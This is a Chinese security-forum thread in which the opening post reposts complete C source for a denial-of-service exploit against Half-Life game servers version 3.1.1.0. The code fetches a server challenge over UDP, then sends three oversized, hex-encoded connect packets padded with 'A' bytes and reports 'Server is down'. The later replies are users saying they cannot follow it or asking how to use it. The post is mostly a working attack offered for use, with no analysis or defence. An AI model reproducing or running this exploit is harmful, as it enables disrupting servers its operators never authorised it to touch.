|
![]() | 作者: bking [bking]
![]() |
登录 |
转载: HACK BY 龙行天下 */ #include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <stdio.h> #include <stdlib.h> int startWinsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0),&wsa); } int main(int argc, char *argv[]) { long rc; SOCKET s,s2,s3,s4; SOCKADDR_IN addr; SOCKADDR_IN remoteAddr; char buf[256]; char challenge[256]; int remoteAddrLen=sizeof(SOCKADDR_IN); char *connect1a; char get[]="\xff" "\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c" "\x6c\x65\x6e\x67\x65\x0a\x00"; char head[]="\xff" "\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74" "\x20\x34\x36\x20"; char connect1 []= "\x20" "\x22\x5c\x70\x72\x6f\x74" "\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c" "\x2d\x31\x5c\x72\x61\x77\x5c" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41" "\x22" //<---the problem "\x22\x20\x22\x5c\x6d\x6f\x64" "\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70" "\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c" "\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f" "\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65" "\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30" "\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61" "\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c" "\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c" "\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64" "\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68" "\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75" "\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e" "\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a"; memset(buf,0,strlen(buf)); memset(challenge,0,strlen(challenge)); if (argc<3) { printf("\n%s <Remote host> <Remote port>\n", argv[0]); exit(1); } else { printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n"); printf("Found and coded by 龙行天下| 23.4.03 | www.xren.net | lotuswolfsky@etang.com \n"); } rc=startWinsock(); if(rc!=0) { printf("Error : startWinsock, error code: %d\n",rc); return 1; } s=socket(AF_INET,SOCK_DGRAM,0); if(s==INVALID_SOCKET) { printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError()); return 1; } addr.sin_family=AF_INET; addr.sin_addr.s_addr =inet_addr(argv[1]); addr.sin_port=htons(atoi(argv[2])); rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); if(rc==SOCKET_ERROR) { printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError()); return 1; } rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen); strcpy(challenge,buf+14); challenge[strlen(challenge)-3]='\0'; printf("Challenge:%s\n",challenge); closesocket(s); connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1)); strcpy(connect1a,head); strcat(connect1a,challenge); strcat(connect1a,connect1); s2=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s2); s3=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s3); s4=socket(AF_INET,SOCK_DGRAM,0); rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN)); Sleep(120); closesocket(s4); printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n"); exit(1); } |
地主 发表时间: 04/24 22:39 |
![]() | 回复: qscy [qscy] ![]() |
登录 |
这是什么东东,这么深奥,俺不懂 |
B1层 发表时间: 04/25 09:31 |
![]() | 回复: max_ax [max_ax] ![]() |
登录 |
有什么用啊 我看不懂啊 |
B2层 发表时间: 04/25 16:42 |
![]() | 回复: langzi183 [langzi183] ![]() |
登录 |
看不懂,深噢 |
B3层 发表时间: 04/26 12:34 |
![]() | 回复: qg [qg] ![]() |
登录 |
请问这个怎么用啊/ |
B4层 发表时间: 03-12-25 20:36 |
![]() | 回复: zerosmile [zerosmile] ![]() |
登录 |
不会吧,有人会用吗? |
B5层 发表时间: 03-12-25 20:49 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号